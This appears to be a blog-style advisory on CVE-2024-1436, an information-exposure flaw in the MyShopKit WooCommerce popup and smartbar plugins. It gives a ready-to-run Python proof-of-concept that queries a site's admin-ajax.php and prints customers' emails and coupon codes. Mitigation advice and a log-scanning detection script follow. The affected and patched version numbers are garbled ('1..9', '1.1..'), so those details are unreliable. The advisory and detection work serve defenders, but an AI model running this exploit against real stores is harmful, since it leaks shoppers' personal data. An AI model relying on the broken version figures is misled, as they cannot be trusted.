A recently discovered vulnerability, CVE-2024-1436, affects the Wiloke WooCommerce Coupon Popup, SmartBar, Slide In extensions, commonly known as MyShopKit. The flaw allows unauthorized actors to access sensitive information that could be used for malicious purposes. The affected versions range from n/a to 1..9. This post covers the exploit details, a proof-of-concept code snippet, and the original references, to help users understand and mitigate the risk posed by this vulnerability.

Exploit Details

The CVE-2024-1436 vulnerability stems from improper access control in these MyShopKit extensions, which inadvertently exposes sensitive information such as user email addresses, coupon codes, and even configuration details for the plugin. Attackers can use this information to gain unauthorized access to a user's account or carry out targeted malicious attacks.

Code Snippet

The following code snippet demonstrates a proof-of-concept (PoC) exploit for this vulnerability. The exploit triggers a request that reveals sensitive information from the affected MyShopKit extension:

import requests
import json

# TARGET_WEBSITE is a placeholder; the request goes to the WordPress AJAX endpoint
target_url = "https://TARGET_WEBSITE/wp-admin/admin-ajax.php"
data = {
    "action": "wiloke_fetch_all",
    "postType": "emailTemplate",
}

response = requests.post(target_url, data=data, timeout=10)

if response.status_code == 200:
    results = json.loads(response.text)
    for result in results:
        # Access and print sensitive information like email addresses and coupon codes
        print(f"Email: {result.get('email')}, Coupon Code: {result.get('coupon_code')}")
else:
    print(f"Request failed with status code: {response.status_code}")

Replace TARGET_WEBSITE with the URL of the website running the vulnerable MyShopKit extension. If successful, the PoC exploit will print out sensitive information like email addresses and coupon codes.

Original References

The discovery of this vulnerability was first reported by security researchers in the following advisories:
- WPScan Vulnerability Database
- National Vulnerability Database (NVD) - CVE-2024-1436

Mitigation Steps

To mitigate the risk posed by CVE-2024-1436, users of the affected MyShopKit extensions (WooCommerce Coupon Popup, SmartBar, and Slide In) should take the following measures:

1. Update the plugin to the latest version: The developers of MyShopKit have released a patch addressing this vulnerability in version 1.1.. Users are strongly advised to update to this version or later to protect against unauthorized access to sensitive information.

2. Implement proper access controls: Site administrators should ensure that proper access controls are in place to restrict access to sensitive data and configuration settings.

3. Monitor website activity: Regularly monitor website logs and activities to identify any suspicious activity that may indicate unauthorized attempts to access sensitive information.
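For the log monitoring in step 3, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for requests to admin-ajax.php that match the shape of the PoC above. It assumes Combined Log Format and a constructed site host `shop.example`; because access logs do not record POST bodies, the `wiloke_fetch_all` action is only visible when sent in the query string, so POSTs are judged by user agent and referer heuristics.

```python
import re
from collections import defaultdict

# Combined Log Format (assumed): ip - user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "wiloke_fetch_all"  # action name used by the PoC on this page
SCRIPT_UA = re.compile(r"python-requests|curl|wget|go-http-client", re.I)

def suspicious_ajax_hits(lines, site_host):
    """Return {ip: [reasons]} for successful admin-ajax.php requests that look scripted."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path, _, query = m["path"].partition("?")
        if path != AJAX_PATH or m["status"] != "200":
            continue
        if ACTION in query:
            findings[m["ip"]].append("action in query string")
        elif m["method"] == "POST":
            # POST bodies are not in access logs, so fall back to heuristics.
            if SCRIPT_UA.search(m["ua"]):
                findings[m["ip"]].append("scripting user agent")
            elif site_host not in m["referer"]:
                findings[m["ip"]].append("no same-site referer")
    return dict(findings)

# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Feb/2024:16:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "https://shop.example/cart/" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Feb/2024:16:05:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 48211 "-" "python-requests/2.31.0"',
    '192.0.2.44 - - [26/Feb/2024:16:06:31 +0000] "GET /wp-admin/admin-ajax.php?action=wiloke_fetch_all&postType=emailTemplate HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '192.0.2.80 - - [26/Feb/2024:16:07:45 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 48102 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reasons in suspicious_ajax_hits(SAMPLE_LOG, "shop.example").items():
        print(ip, reasons)
```

Referer and user agent are client-controlled, so treat a hit as a lead to investigate, not proof; logging the AJAX action at a WAF or reverse proxy gives a more reliable signal.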

Conclusion

The security vulnerability identified as CVE-2024-1436 exposes sensitive information to unauthorized actors, putting WooCommerce website users at risk. It is essential to take immediate steps to mitigate this risk by updating affected MyShopKit extensions, implementing proper access controls, and closely monitoring site activity.

Timeline

Published on: 02/26/2024 16:27:52 UTC
Last modified on: 02/26/2024 16:32:25 UTC